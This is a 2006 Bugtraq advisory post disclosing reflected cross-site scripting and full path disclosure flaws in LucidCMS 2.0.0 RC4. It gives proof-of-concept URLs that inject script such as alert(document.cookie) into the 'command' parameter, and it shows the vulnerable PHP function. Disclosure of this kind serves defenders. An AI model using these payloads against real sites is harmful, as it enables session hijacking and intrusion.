Home page logo
/

bugtraq logo Bugtraq mailing list archives

Multiple Vulnerabilities in LucidCMS
From: crasher () kecoak or id
Date: Sun, 02 Apr 2006 13:07:13 +0700

Multiple Vulnerabilities in LucidCMS

 Author   : Rusydi Hasan M
 a.k.a    : cR45H3R
 Date     : April,1st 2006
 Location : Indonesia, Cilacap

--- Software description

 lucidCMS is a simple and flexible content management system for
 the individual or organization that wishes to manage a collection
 of web pages without the overhead and complexity of other available
 open source "community" CMS options.

 HOME    : http://lucidCMS.net
 Version : 2.0.0 RC4

--- The bugs

 There's 2 bugs.XSS and full path disclosures

--- PoC


1. XSS a.k.a Cross site scripting

   How the Proof of concepts ?

   http://[victim]/[lucidcms_dir]/index.php?command=login'>[XSS_here]
   http://[victim]/[lucidcms_dir]/index.php?i18n=cs_CZ&command=panel'>[XSS_here]
   http://[victim]/[lucidcms_dir]/index.php?i18n=en_US&command=panel'>[XSS_here]

   example :

  
http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel&apos;><script>alert(document.cookie)</script>

   http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel&apos;><h1>Bla bla
bla</h1>

   http://127.0.0.1/lucidcms/index.php?command=login&apos;><script>alert('patch your
   lucidCMS')</script>

  
http://127.0.0.1/lucidcms/index.php?i18n=cs_CZ&command=panel&apos;><h1>stooopidz</h1>


2. Full path disclosures

   in /lucid_phplib/translator.php

   http://[victim]/[lucidcms_dir]/lucid_phplib/translator.php

   Warning: opendir(DIR_LANG): failed to open dir: No such file or directory in
   /var/www/html/lucidcms/lucid_phplib/translator.php on line 45

   Warning: readdir(): supplied argument is not a valid Directory resource in
   /var/www/html/lucidcms/lucid_phplib/translator.php on line 46

   Where's the problem ???

   function get_languages(){
        $langs = array();
        $dir = opendir(DIR_LANG); <-- This is the trouble
        while($name = readdir($dir)) { <-- and this too
                if ($name == '.' || $name== '..') continue;
                $langFile = DIR_LANG.$name.'/LC_MESSAGES/'.CONFIG_DOMAIN.'.mo';
                if (file_exists($langFile)) {
//                      $GLOBALS['echoLater'][] = $langFile; //troublshooting...
                        $langs[] = $name;
                }
        }
        return $langs;
}//get_languages


--- vendor

   I'm too lazy :D .

--- shoutz

1. kecoak
(fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
2. echo staff (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
anonymous, the day)
3. ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,negative,sakitjiwa

--- contact

   crasher () kecoak or id


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]